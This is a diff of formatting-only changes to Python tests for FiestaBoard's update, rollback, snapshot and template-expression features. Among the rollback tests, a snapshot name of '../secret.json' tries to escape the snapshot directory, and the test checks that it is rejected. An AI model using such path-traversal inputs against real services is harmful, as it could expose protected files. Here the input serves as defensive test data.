         assert data["update_available"] is False
@@ -75,7 +79,7 @@ class TestUpdateCheck:
         """Test graceful handling when GitHub API is unreachable."""
         with patch("src.api_server.requests.get", side_effect=Exception("Network error")):
             response = client.get("/system/update-check")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["update_available"] is False
@@ -90,10 +94,12 @@ class TestUpdateCheck:
         mock_response.json.return_value = {"tag_name": "v1.0.0"}
         mock_response.raise_for_status = Mock()
 
-        with patch("src.api_server.requests.get", return_value=mock_response), \
-             patch.dict("os.environ", {"PRODUCTION": "true"}):
+        with (
+            patch("src.api_server.requests.get", return_value=mock_response),
+            patch.dict("os.environ", {"PRODUCTION": "true"}),
+        ):
             response = client.get("/system/update-check")
-        
+
         assert response.status_code == 200
         assert response.json()["is_production"] is True
 
@@ -106,7 +112,7 @@ class TestUpdateCheck:
 
         with patch("src.api_server.requests.get", return_value=mock_response):
             response = client.get("/system/update-check")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["latest_version"] == "99.0.0"
@@ -123,13 +129,7 @@ class TestDockerHubCheck:
         tags_resp = Mock()
         tags_resp.status_code = 200
         tags_resp.json.return_value = {
-            "results": [
-                {"name": "latest"},
-                {"name": "2.0.0"},
-                {"name": "2.0.1"},
-                {"name": "2.1.0"},
-                {"name": "main"}
-            ]
+            "results": [{"name": "latest"}, {"name": "2.0.0"}, {"name": "2.0.1"}, {"name": "2.1.0"}, {"name": "main"}]
         }
         tags_resp.raise_for_status = Mock()
 
@@ -144,13 +144,7 @@ class TestDockerHubCheck:
 
         tags_resp = Mock()
         tags_resp.status_code = 200
-        tags_resp.json.return_value = {
-            "results": [
-                {"name": "latest"},
-                {"name": "main"},
-                {"name": "dev"}
-            ]
-        }
+        tags_resp.json.return_value = {"results": [{"name": "latest"}, {"name": "main"}, {"name": "dev"}]}
         tags_resp.raise_for_status = Mock()
 
         with patch("src.api_server.requests.get", return_value=tags_resp):
@@ -190,12 +184,7 @@ class TestDockerHubCheck:
 
         tags_resp = Mock()
         tags_resp.status_code = 200
-        tags_resp.json.return_value = {
-            "results": [
-                {"name": "99.0.0"},
-                {"name": "2.0.0"}
-            ]
-        }
+        tags_resp.json.return_value = {"results": [{"name": "99.0.0"}, {"name": "2.0.0"}]}
         tags_resp.raise_for_status = Mock()
 
         github_resp = Mock()
@@ -251,30 +240,37 @@ class TestIsNewerVersion:
 
     def test_newer_major(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("3.0.0", "2.0.0") is True
 
     def test_newer_minor(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("2.1.0", "2.0.0") is True
 
     def test_newer_patch(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("2.0.1", "2.0.0") is True
 
     def test_same_version(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("2.0.0", "2.0.0") is False
 
     def test_older_version(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("1.9.0", "2.0.0") is False
 
     def test_invalid_version(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("invalid", "2.0.0") is False
 
     def test_empty_string(self):
         from src.api_server import _is_newer_version
+
         assert _is_newer_version("", "2.0.0") is False
 
 
@@ -282,6 +278,7 @@ class TestIsNewerVersion:
 # Tests for self-update sidecar endpoints
 # (/system/update/status, /system/update, /system/update/auto)
 # =============================================================================
+
 
 class TestSystemUpdateStatus:
     """Tests for /system/update/status."""
@@ -341,10 +338,9 @@ class TestSystemUpdateApply:
     def test_sidecar_unreachable_returns_503(self, client, tmp_path, monkeypatch):
         """When the sidecar host is unreachable, we surface a manual fallback."""
         import requests as _requests
+
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps"
-        )
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps")
         with patch(
             "src.api_server.requests.post",
             side_effect=_requests.exceptions.ConnectionError("nope"),
@@ -356,9 +352,7 @@ class TestSystemUpdateApply:
     def test_sidecar_rejects_token(self, client, tmp_path, monkeypatch):
         """A 401 from the sidecar means our shared token is misconfigured."""
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps"
-        )
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps")
         bad = Mock(status_code=401, text="invalid_token")
         with patch("src.api_server.requests.post", return_value=bad):
             response = client.post("/system/update")
@@ -404,6 +398,7 @@ class TestSystemUpdateAutoToggle:
         # docker profile defaults to "weekly"
         assert body1["interval"] == "weekly"
         import json as _json
+
         persisted = _json.loads(state_file.read_text())
         assert persisted["auto_update_enabled"] is True
         assert persisted["auto_update_interval"] == "weekly"
@@ -495,33 +490,41 @@ class TestUpdateCheckDueHelper:
 
     def test_no_last_check_is_due(self):
         from src.api_server import _is_update_check_due
+
         assert _is_update_check_due({}, period_days=7) is True
 
     def test_recent_check_not_due(self):
+        from datetime import datetime
+
         from src.api_server import _is_update_check_due
-        from datetime import datetime, timezone
-        recent = datetime.now(timezone.utc).isoformat()
+
+        recent = datetime.now(UTC).isoformat()
         assert _is_update_check_due({"last_check": recent}, period_days=7) is False
 
     def test_old_check_is_due(self):
+        from datetime import datetime, timedelta
+
         from src.api_server import _is_update_check_due
-        from datetime import datetime, timezone, timedelta
-        old = (datetime.now(timezone.utc) - timedelta(days=30)).isoformat()
+
+        old = (datetime.now(UTC) - timedelta(days=30)).isoformat()
         assert _is_update_check_due({"last_check": old}, period_days=7) is True
 
     def test_manual_period_never_due(self):
         from src.api_server import _is_update_check_due
+
         # period_days <= 0 means "manual"; never run regardless of last_check
         assert _is_update_check_due({}, period_days=0) is False
 
     def test_malformed_last_check_treated_as_due(self):
         from src.api_server import _is_update_check_due
+
         assert _is_update_check_due({"last_check": "not-a-date"}, period_days=7) is True
 
 
 # =============================================================================
 # Tests for /system/restart
 # =============================================================================
+
 
 class TestSystemRestart:
     """Tests for POST /system/restart."""
@@ -534,6 +537,7 @@ class TestSystemRestart:
 
     def test_sidecar_unreachable_returns_503(self, client, monkeypatch):
         import requests as _requests
+
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
         with patch(
             "src.api_server.requests.post",
@@ -566,6 +570,7 @@ class TestSystemRestart:
 # Tests for /system/shutdown
 # =============================================================================
 
+
 class TestSystemShutdown:
     """Tests for POST /system/shutdown."""
 
@@ -577,6 +582,7 @@ class TestSystemShutdown:
 
     def test_sidecar_unreachable_returns_503(self, client, monkeypatch):
         import requests as _requests
+
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
         with patch(
             "src.api_server.requests.post",
@@ -644,6 +650,7 @@ class TestSettingsSnapshots:
     def test_take_snapshot_creates_file(self, tmp_path, monkeypatch):
         """A snapshot file lands in SETTINGS_SNAPSHOT_DIR with valid JSON."""
         from src import api_server as api
+
         snap_dir = tmp_path / "update-backups"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
 
@@ -656,6 +663,7 @@ class TestSettingsSnapshots:
         assert files[0].name.endswith(".json")
         # Snapshot is a BackupService document.
         import json as _json
+
         with files[0].open() as fh:
             doc = _json.load(fh)
         assert doc.get("fiestaboard_backup") is True
@@ -664,6 +672,7 @@ class TestSettingsSnapshots:
     def test_retention_keeps_only_five(self, tmp_path, monkeypatch):
         """Six snapshots → only the newest five remain after pruning."""
         from src import api_server as api
+
         snap_dir = tmp_path / "update-backups"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
 
@@ -684,6 +693,7 @@ class TestSettingsSnapshots:
     def test_resolve_rejects_path_traversal(self, tmp_path, monkeypatch):
         """``..`` and absolute paths must not escape the snapshot dir."""
         from src import api_server as api
+
         snap_dir = tmp_path / "update-backups"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
         snap_dir.mkdir()
@@ -702,6 +712,7 @@ class TestSettingsSnapshots:
     def test_resolve_returns_newest_when_name_omitted(self, tmp_path, monkeypatch):
         """Calling ``_resolve_snapshot_name(None)`` returns the latest snapshot."""
         from src import api_server as api
+
         snap_dir = tmp_path / "update-backups"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
         m1 = api._take_settings_snapshot()
@@ -720,12 +731,8 @@ class TestSystemUpdateStatusRollbackFields:
     def test_status_includes_sidecar_last_update(self, client, tmp_path, monkeypatch):
         """A rolled-back attempt is reflected in the status payload."""
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json"
-        )
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps"
-        )
+        monkeypatch.setattr("src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json")
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps")
 
         # Mock both /healthz (probe) and /last-update with one fake `requests.get`.
         def _fake_get(url, **_kwargs):
@@ -754,17 +761,11 @@ class TestSystemUpdateStatusRollbackFields:
         assert body["last_update_previous_digest"] == "sha256:bad"
         assert body["last_update_completed_at"] == "2026-05-03T12:00:00Z"
 
-    def test_status_skips_last_update_when_sidecar_unreachable(
-        self, client, tmp_path, monkeypatch
-    ):
+    def test_status_skips_last_update_when_sidecar_unreachable(self, client, tmp_path, monkeypatch):
         """If the sidecar is down, status must not pretend to know its state."""
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json"
-        )
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps"
-        )
+        monkeypatch.setattr("src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json")
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps")
         with patch("src.api_server.requests.get", side_effect=Exception("boom")):
             r = client.get("/system/update/status")
         assert r.status_code == 200
@@ -775,11 +776,10 @@ class TestSystemUpdateStatusRollbackFields:
     def test_status_lists_settings_snapshots(self, client, tmp_path, monkeypatch):
         """Status payload lists snapshots so the UI can offer rollback."""
         from src import api_server as api
+
         snap_dir = tmp_path / "snaps"
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json"
-        )
+        monkeypatch.setattr("src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json")
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
         api._take_settings_snapshot()
         api._take_settings_snapshot()
@@ -800,9 +800,7 @@ class TestSystemUpdateApplyTakesSnapshot:
 
     def test_snapshot_returned_in_apply_response(self, client, tmp_path, monkeypatch):
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
-        monkeypatch.setattr(
-            "src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json"
-        )
+        monkeypatch.setattr("src.api_server.SYSTEM_UPDATE_STATE_FILE", tmp_path / "state.json")
         snap_dir = tmp_path / "update-backups"
         monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", snap_dir)
 
@@ -821,9 +819,7 @@ class TestSystemUpdateRollback:
     """``POST /system/update/rollback`` rolls settings + image back."""
 
     def test_404_when_no_snapshots_exist(self, client, tmp_path, monkeypatch):
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "empty"
-        )
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "empty")
         r = client.post("/system/update/rollback", json={"restore_image": False})
         assert r.status_code == 404
 
@@ -842,9 +838,7 @@ class TestSystemUpdateRollback:
         snap_dir.mkdir()
         monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", snap_dir)
         # Plant an actual backup-shaped file outside the snap dir.
-        (tmp_path / "secret.json").write_text(
-            '{"fiestaboard_backup":true,"schema_version":1,"data":{}}'
-        )
+        (tmp_path / "secret.json").write_text('{"fiestaboard_backup":true,"schema_version":1,"data":{}}')
         r = client.post(
             "/system/update/rollback",
             json={"snapshot": "../secret.json", "restore_image": False},
@@ -852,9 +846,7 @@ class TestSystemUpdateRollback:
         assert r.status_code == 404
 
     def test_400_when_neither_settings_nor_image_requested(self, client, tmp_path, monkeypatch):
-        monkeypatch.setattr(
-            "src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps"
-        )
+        monkeypatch.setattr("src.api_server.SETTINGS_SNAPSHOT_DIR", tmp_path / "snaps")
         r = client.post(
             "/system/update/rollback",
             json={"restore_settings": False, "restore_image": False},
@@ -863,12 +855,14 @@ class TestSystemUpdateRollback:
 
     def test_settings_only_happy_path(self, client, tmp_path, monkeypatch):
         from src import api_server as api
+
         snap_dir = tmp_path / "snaps"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
 
         # Point BackupService at an isolated data dir so the test can't
         # mutate the real repository's data/.
         from src.backup import service as backup_service
+
         bs = backup_service.BackupService(data_dir=tmp_path / "data")
         monkeypatch.setattr(backup_service, "_backup_service", bs)
         # Seed a settings file so the snapshot has something to capture.
@@ -882,7 +876,7 @@ class TestSystemUpdateRollback:
 
         # Stub the post-restore service-reload helpers — the real reloads
         # touch global singletons we don't want to mess with from tests.
-        monkeypatch.setattr(backup_service, "_reload_services", lambda: [])
+        monkeypatch.setattr(backup_service, "_reload_services", list)
 
         # Settings-only rollback (restore_image=False so we don't need
         # to mock the sidecar's /rollback endpoint).
@@ -895,12 +889,11 @@ class TestSystemUpdateRollback:
         assert "settings.json" in body["settings_rollback"]["restored_files"]
         # The original value is back.
         import json as _json
+
         with (tmp_path / "data" / "settings.json").open() as fh:
             assert _json.load(fh) == {"k": "v"}
 
-    def test_image_rollback_calls_sidecar_with_snapshot_metadata(
-        self, client, tmp_path, monkeypatch
-    ):
+    def test_image_rollback_calls_sidecar_with_snapshot_metadata(self, client, tmp_path, monkeypatch):
         """When ``restore_image=True``, the sidecar /rollback is called
         with the digest+image recorded inside the snapshot.
 
@@ -908,22 +901,24 @@ class TestSystemUpdateRollback:
         full end-to-end path.
         """
         from src import api_server as api
+
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
         snap_dir = tmp_path / "snaps"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
         from src.backup import service as backup_service
+
         bs = backup_service.BackupService(data_dir=tmp_path / "data")
         monkeypatch.setattr(backup_service, "_backup_service", bs)
         (tmp_path / "data").mkdir()
         (tmp_path / "data" / "settings.json").write_text('{"k":"v"}')
-        monkeypatch.setattr(backup_service, "_reload_services", lambda: [])
+        monkeypatch.setattr(backup_service, "_reload_services", list)
 
         # Take a snapshot annotated with a known digest+image.
         digest = "sha256:" + ("a" * 64)
         meta = api._take_settings_snapshot(digest, "fiestaboard/fiestaboard:latest")
         assert meta is not None
 
-        captured: Dict[str, Any] = {}
+        captured: dict[str, Any] = {}
 
         def _fake_post(url, json=None, **_kwargs):
             captured["url"] = url
@@ -944,21 +939,21 @@ class TestSystemUpdateRollback:
             "image": "fiestaboard/fiestaboard:latest",
         }
 
-    def test_image_rollback_warns_on_unannotated_snapshot(
-        self, client, tmp_path, monkeypatch
-    ):
+    def test_image_rollback_warns_on_unannotated_snapshot(self, client, tmp_path, monkeypatch):
         """A snapshot with no recorded digest/image cannot drive the
         sidecar's /rollback — we surface a warning rather than guess."""
         from src import api_server as api
+
         monkeypatch.setenv("FIESTAUPDATER_TOKEN", "tok")
         snap_dir = tmp_path / "snaps"
         monkeypatch.setattr(api, "SETTINGS_SNAPSHOT_DIR", snap_dir)
         from src.backup import service as backup_service
+
         bs = backup_service.BackupService(data_dir=tmp_path / "data")
         monkeypatch.setattr(backup_service, "_backup_service", bs)
         (tmp_path / "data").mkdir()
         (tmp_path / "data" / "settings.json").write_text('{"k":"v"}')
-        monkeypatch.setattr(backup_service, "_reload_services", lambda: [])
+        monkeypatch.setattr(backup_service, "_reload_services", list)
 
         # Snapshot without any digest/image annotation.
         meta = api._take_settings_snapshot()
@@ -979,6 +974,7 @@ class TestUpdaterLastUpdateHelper:
 
     def test_returns_dict_on_success(self, monkeypatch):
         from src import api_server as api
+
         ok = Mock(status_code=200)
         ok.json.return_value = {"status": "success"}
         with patch("src.api_server.requests.get", return_value=ok):
@@ -986,10 +982,12 @@ class TestUpdaterLastUpdateHelper:
 
     def test_returns_empty_on_network_error(self, monkeypatch):
         from src import api_server as api
+
         with patch("src.api_server.requests.get", side_effect=Exception("nope")):
             assert api._updater_last_update() == {}
 
     def test_returns_empty_on_non_200(self, monkeypatch):
         from src import api_server as api
+
         with patch("src.api_server.requests.get", return_value=Mock(status_code=500)):
             assert api._updater_last_update() == {}

--- a/tests/test_template_expressions.py
+++ b/tests/test_template_expressions.py
@@ -6,14 +6,13 @@ template engine via ``{{= ... }}`` blocks.
 
 import pytest
 
+from src.templates.engine import TemplateEngine
 from src.templates.expressions import (
     ErrorValue,
     evaluate,
     list_builtins,
     render_expressions,
 )
-from src.templates.engine import TemplateEngine
-
 
 # --------------------------------------------------------------------------- #
 # Standalone evaluator
@@ -254,12 +253,7 @@ class TestVariables:
                 }
             }
         }
-        assert (
-            evaluate(
-                "home_assistant.sensor_outdoor_temp.attributes.friendly_name", ctx
-            )
-            == "Outdoor Temp"
-        )
+        assert evaluate("home_assistant.sensor_outdoor_temp.attributes.friendly_name", ctx) == "Outdoor Temp"
 
     def test_home_assistant_missing_entity_returns_ref(self):
         ctx = {"home_assistant": {"sensor.outdoor_temp": {"state": "72"}}}
@@ -271,10 +265,7 @@ class TestVariables:
 
     def test_home_assistant_in_iferror(self):
         ctx = {"home_assistant": {}}
-        assert (
-            evaluate('IFERROR(home_assistant.missing_entity.state, "n/a")', ctx)
-            == "n/a"
-        )
+        assert evaluate('IFERROR(home_assistant.missing_entity.state, "n/a")', ctx) == "n/a"
 
     def test_home_assistant_direct_key_still_works(self):
         # If the context already stores the entity under an underscore key
@@ -414,9 +405,7 @@ class TestRenderExpressions:
 
     def test_formula_alongside_plain_var(self):
         assert (
-            render_expressions(
-                "{{= UPPER(\"hi\") }} - {{w.t}}", {"w": {"t": 1}}
-            )
+            render_expressions('{{= UPPER("hi") }} - {{w.t}}', {"w": {"t": 1}})
             == "HI - {{w.t}}"  # plain {{var}} is left for the next pass
         )
 
@@ -446,14 +435,12 @@ class TestEngineIntegration:
 
     def test_render_variable_in_formula(self, engine):
         ctx = {"weather": {"temperature": 72}}
-        out = engine.render("{{= weather.temperature & \"F\" }}", ctx)
+        out = engine.render('{{= weather.temperature & "F" }}', ctx)
         assert out == "72F"
 
     def test_render_if(self, engine):
         ctx = {"weather": {"temperature": 90}}
-        out = engine.render(
-            '{{= IF(weather.temperature > 80, "HOT", "OK") }}', ctx
-        )
+        out = engine.render('{{= IF(weather.temperature > 80, "HOT", "OK") }}', ctx)
         assert out == "HOT"
 
     def test_render_color_function_produces_tile(self, engine):
@@ -474,7 +461,7 @@ class TestEngineIntegration:
         ctx = {"weather": {"temperature": 72}}
         # Mix old-style and new-style.
         out = engine.render(
-            'old={{weather.temperature}} new={{= weather.temperature + 1 }}',
+            "old={{weather.temperature}} new={{= weather.temperature + 1 }}",
             ctx,
         )
         assert out == "old=72 new=73"
@@ -485,15 +472,13 @@ class TestEngineIntegration:
 
     def test_formula_and_named_color_together(self, engine):
         ctx = {"weather": {"temperature": 72}}
-        out = engine.render(
-            "{{red}}{{= weather.temperature }}", ctx
-        )
+        out = engine.render("{{red}}{{= weather.temperature }}", ctx)
         assert out == "{63}72"
 
     def test_formula_render_lines(self, engine):
         ctx = {"weather": {"temperature": 72}}
         rendered = engine.render_lines(
-            ["{{= \"Temp \" & weather.temperature & \"F\" }}"],
+            ['{{= "Temp " & weather.temperature & "F" }}'],
             context=ctx,
             line_metadata=[{"alignment": "left", "wrap": False}],
             device_type="flagship",
@@ -518,8 +503,7 @@ class TestPublicAPI:
         names = list_builtins()
         assert names == tuple(sorted(set(names)))
         # Spot-check a few that absolutely must be present.
-        for required in ("IF", "IFS", "AND", "OR", "NOT", "COLOR", "UPPER",
-                         "ROUND", "IFERROR", "CONCAT"):
+        for required in ("IF", "IFS", "AND", "OR", "NOT", "COLOR", "UPPER", "ROUND", "IFERROR", "CONCAT"):
             assert required in names
 
     def test_list_builtins_matches_signatures(self):
@@ -527,6 +511,7 @@ class TestPublicAPI:
         # function picker is never missing entries. This is the test that
         # would have caught COALESCE/PROPER/etc. being added without docs.
         from src.templates.expressions import function_signatures
+
         assert set(list_builtins()) == set(function_signatures().keys())
 
     def test_error_value_repr(self):
@@ -654,11 +639,13 @@ class TestRoundUpDown:
 class TestValidateExpression:
     def test_clean_expression(self):
         from src.templates.expressions import validate_expression
+
         assert validate_expression("1 + 2") == []
         assert validate_expression('IF(1 > 0, "y", "n")') == []
 
     def test_syntax_error_reports_position(self):
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("1 + @")
         assert len(issues) == 1
         assert issues[0].code == "#SYNTAX"
@@ -666,43 +653,46 @@ class TestValidateExpression:
 
     def test_unknown_function(self):
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("BOGUS(1)")
         assert any(i.code == "#NAME?" for i in issues)
 
     def test_arity_too_few(self):
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("IF(TRUE)")
-        assert any(i.code == "#VALUE" and "expected at least 2" in i.message
-                   for i in issues)
+        assert any(i.code == "#VALUE" and "expected at least 2" in i.message for i in issues)
 
     def test_arity_too_many(self):
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("ABS(1, 2, 3)")
-        assert any(i.code == "#VALUE" and "expected at most 1" in i.message
-                   for i in issues)
+        assert any(i.code == "#VALUE" and "expected at most 1" in i.message for i in issues)
 
     def test_unknown_source_with_known_set(self):
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("missing.field", known_sources={"weather"})
         assert any(i.code == "#REF" for i in issues)
 
     def test_known_source_no_issue(self):
         from src.templates.expressions import validate_expression
-        issues = validate_expression("weather.temperature",
-                                     known_sources={"weather"})
+
+        issues = validate_expression("weather.temperature", known_sources={"weather"})
         assert issues == []
 
     def test_plugin_instance_with_colon(self):
         from src.templates.expressions import validate_expression
+
         # ``weather:home.temperature`` -- the source is "weather".
-        issues = validate_expression("weather:home.temperature",
-                                     known_sources={"weather"})
+        issues = validate_expression("weather:home.temperature", known_sources={"weather"})
         assert issues == []
 
 
 class TestFindFormulas:
     def test_single_formula(self):
         from src.templates.expressions import find_formulas
+
         out = find_formulas("Hi {{= 1 + 1 }} there")
         assert len(out) == 1
         start, end, body = out[0]
@@ -711,17 +701,20 @@ class TestFindFormulas:
 
     def test_multiple_formulas(self):
         from src.templates.expressions import find_formulas
+
         out = find_formulas("{{= 1 }} and {{= 2 }}")
         assert [o[2] for o in out] == ["1", "2"]
 
     def test_ignores_plain_vars(self):
         from src.templates.expressions import find_formulas
+
         assert find_formulas("hi {{plugin.field}} there") == []
 
 
 class TestFunctionSignatures:
     def test_returns_dict(self):
         from src.templates.expressions import function_signatures, list_builtins
+
         sigs = function_signatures()
         # Every built-in is documented.
         assert set(sigs.keys()) == set(list_builtins())
@@ -730,11 +723,11 @@ class TestFunctionSignatures:
             assert set(info.keys()) == {"category", "signature", "summary"}
             assert info["signature"].startswith(name)
             assert info["summary"]
-            assert info["category"] in {"logic", "math", "text",
-                                         "convert", "color"}
+            assert info["category"] in {"logic", "math", "text", "convert", "color"}
 
     def test_categories_balance(self):
         from src.templates.expressions import function_signatures
+
         sigs = function_signatures()
         # A sanity check that we have a useful spread.
         cats = {info["category"] for info in sigs.values()}
@@ -748,6 +741,7 @@ class TestEngineValidationIntegration:
         # Pretend "weather" is a known plugin so unknown-source errors
         # actually trigger.
         from unittest.mock import Mock
+
         e._plugin_registry = Mock()
         e._plugin_registry.plugins = {"weather": object()}
         e._plugin_registry._manifests = {}
@@ -767,8 +761,7 @@ class TestEngineValidationIntegration:
 
     def test_formula_unknown_source_surfaced(self, engine):
         errs = engine.validate_template("{{= mystery.thing }}")
-        assert any("Formula #REF" in e.message and "mystery" in e.message
-                   for e in errs)
+        assert any("Formula #REF" in e.message and "mystery" in e.message for e in errs)
 
     def test_formula_arity_error_surfaced(self, engine):
         errs = engine.validate_template("{{= IF(TRUE) }}")
@@ -795,7 +788,7 @@ class TestRenderLinesIntegration:
     def test_left_aligned_formula(self, engine):
         ctx = {"weather": {"temperature": 72}}
         out = engine.render_lines(
-            ["{{= weather.temperature & \"F\" }}"],
+            ['{{= weather.temperature & "F" }}'],
             context=ctx,
             line_metadata=[{"alignment": "left", "wrap": False}],
             device_type="flagship",
@@ -874,7 +867,9 @@ class TestNullAndBlankSemantics:
 class TestExpressionIssueShape:
     def test_is_serializable_friendly(self):
         from dataclasses import asdict
+
         from src.templates.expressions import validate_expression
+
         issues = validate_expression("@@@")
         assert issues
         d = asdict(issues[0])

--- a/tests/test_template_expressions.py
+++ b/tests/test_template_expressions.py
@@ -695,7 +695,7 @@ class TestFindFormulas:
 
         out = find_formulas("Hi {{= 1 + 1 }} there")
         assert len(out) == 1
-        start, end, body = out[0]
+        start, _end, body = out[0]
         assert body == "1 + 1"
         assert start == 3
 

--- a/tests/test_templates.py
+++ b/tests/test_templates.py
@@ -1,29 +1,29 @@
 """Tests for template engine."""
 
-import pytest
 from unittest.mock import Mock, patch
 
+import pytest
+
 from src.templates.engine import (
-    TemplateEngine,
     COLOR_CODES,
     SYMBOL_CHARS,
+    TemplateEngine,
 )
 
 
 class TestTemplateEngineBasics:
     """Tests for basic template engine functionality."""
-    
+
     @pytest.fixture
     def engine(self):
         """Create a template engine with mocked display service."""
-        engine = TemplateEngine()
-        return engine
-    
+        return TemplateEngine()
+
     def test_render_plain_text(self, engine):
         """Test rendering plain text without any template syntax."""
         result = engine.render("Hello World", context={})
         assert result == "Hello World"
-    
+
     def test_render_preserves_spaces(self, engine):
         """Test that spaces are preserved."""
         result = engine.render("  Spaced  Text  ", context={})
@@ -32,50 +32,50 @@ class TestTemplateEngineBasics:
 
 class TestVariableSubstitution:
     """Tests for {{variable}} substitution."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_simple_variable(self, engine):
         """Test simple variable substitution."""
         context = {"weather": {"temperature": 72}}
         result = engine.render("Temp: {{weather.temperature}}", context)
         assert result == "Temp: 72"
-    
+
     def test_nested_variable(self, engine):
         """Test nested variable access."""
         context = {"weather": {"current": {"temp": 72}}}
         result = engine.render("{{weather.current.temp}}", context)
         assert result == "72"
-    
+
     def test_missing_source(self, engine):
         """Test missing source returns error indicator."""
         result = engine.render("{{missing.field}}", context={})
         assert "???" in result  # Error indicator for missing/unavailable
-    
+
     def test_missing_field(self, engine):
         """Test missing field returns error indicator."""
         context = {"weather": {"temperature": 72}}
         result = engine.render("{{weather.missing}}", context)
         assert "???" in result
-    
+
     def test_boolean_value(self, engine):
         """Test boolean values are converted to Yes/No."""
         context = {"baywheels": {"is_renting": True}}
         result = engine.render("Renting: {{baywheels.is_renting}}", context)
         assert "Yes" in result
-        
+
         context = {"baywheels": {"is_renting": False}}
         result = engine.render("Renting: {{baywheels.is_renting}}", context)
         assert "No" in result
-    
+
     def test_numeric_value(self, engine):
         """Test numeric values are formatted correctly."""
         context = {"weather": {"temperature": 72.5}}
         result = engine.render("{{weather.temperature}}", context)
         assert result == "72.5"
-        
+
         context = {"weather": {"temperature": 72.0}}
         result = engine.render("{{weather.temperature}}", context)
         assert result == "72"  # No decimal for whole numbers
@@ -83,17 +83,17 @@ class TestVariableSubstitution:
 
 class TestFilters:
     """Tests for value filters (|pad, |upper, etc.)."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_pad_filter(self, engine):
         """Test |pad:N filter."""
         context = {"weather": {"temperature": 72}}
         result = engine.render("{{weather.temperature|pad:5}}", context)
         assert result == "72   "  # Padded to 5 chars
-    
+
     def test_truncate_filter(self, engine):
         """Test |truncate:N filter."""
         context = {"weather": {"condition": "Partly Cloudy"}}
@@ -103,27 +103,27 @@ class TestFilters:
 
 class TestColors:
     """Tests for color code handling."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_color_codes_defined(self):
         """Test all expected colors are defined."""
         expected = ["red", "orange", "yellow", "green", "blue", "violet", "white", "black"]
         for color in expected:
             assert color in COLOR_CODES
-    
+
     def test_named_color_normalized(self, engine):
         """Test named colors are normalized to codes."""
         result = engine.render("{{red}}Text{{/red}}", context={})
         assert "{63}" in result  # Red = 63
-    
+
     def test_numeric_color_preserved(self, engine):
         """Test numeric color codes are preserved."""
         result = engine.render("{{63}}Text{{/}}", context={})
         assert "{63}" in result
-    
+
     def test_color_end_tag_normalized(self, engine):
         """Test color end tags are normalized."""
         result = engine.render("{{red}}Text{{/red}}", context={})
@@ -133,27 +133,27 @@ class TestColors:
 
 class TestSymbols:
     """Tests for symbol shortcuts."""
-    
+
     @pytest.fixture
     def engine(self):
         return TemplateEngine()
-    
+
     def test_symbols_defined(self):
         """Test all expected symbols are defined."""
         expected = ["sun", "cloud", "rain", "snow", "storm"]
         for symbol in expected:
             assert symbol in SYMBOL_CHARS
-    
+
     def test_sun_symbol(self, engine):
         """Test {sun} symbol."""
